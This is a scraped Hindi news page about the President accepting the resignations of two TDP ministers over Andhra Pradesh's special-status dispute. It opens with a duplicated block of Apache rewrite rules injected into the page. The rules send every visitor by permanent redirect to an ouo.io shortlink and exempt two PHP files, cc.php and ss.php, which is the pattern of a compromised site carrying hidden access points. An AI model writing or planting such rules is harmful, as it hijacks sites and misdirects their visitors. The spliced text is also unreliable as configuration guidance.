
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 896
Nextनई दिल्ली। राष्ट्रपति रामनाथ कोविंद ने तेलुगू देशम पार्टी (टीडीपी) के मंत्रियों अशोक गजपति राजू और वाईएस चौधरी के इस्तीफे को मंजूर कर लिया है। दोनों सांसदों ने वित्तमंत्री अरुण जेटली द्वारा आंध्र प्रदेश को विशेष राज्य का दर्जा ना देने की वजह से अपने पद से इस्तीफा दिया है। बुधवार को वित्तमंत्री ने टीडीपी सांसदों और आंध्र प्रदेश सरकार द्वारा उनके राज्य को विशेष दर्जा देने की मांग पर विचार करके निर्णय लिया था। निर्णय में अरुण जेटली ने विशेष दर्जा जैसी स्थिति से बचते हुए विशेष पैकेज देने की घोषणा की थी लेकिन टीडीपी के प्रमुख और राज्य के मुख्यमंत्री चंद्रबाबू नायडू इतने भर से संतुष्ट नहीं हुए। उन्होंने बुधवार सात मार्च को एनडीए के मंत्रिमंडल से अपने मंत्रियों को हटाने का संकेत देते हुए उनके इस्तीफे की घोषणा की थी।
सूत्र बताते हैं कि नायडू को मनाने के लिए प्रधानमंत्री ने खुद उनसे फोन पर बात की थी। दोनों नेताओं के बीच करीब 20 मिनट तक फोन पर चर्चा हुई और इसके बाद गुरुवार 8 मार्च को टीडीपी के दोनों मंत्रियों (अशोक गजपति राजू और वाई एस चौधरी) ने अपने पद से त्यागपत्र दे दिया था। हालांकि टीडीपी कोटे से कैबिनेट मंत्री अशोक गजपति राजू ने साफ करते हुए कहा था कि यह केन्द्र सरकार के केन्द्रीय मंत्रिमंडल से इस्तीफा है। अभी उनकी पार्टी एनडीए का हिस्सा है। राजू के अनुसार ताजा स्थिति का हल निकालने की भी कोशिश की जा रही है। फिलहाल उनकी पार्टी एनडीए से अलग नहीं हुई है और उनके बीच सौहार्दपूर्ण रिश्ते हैं।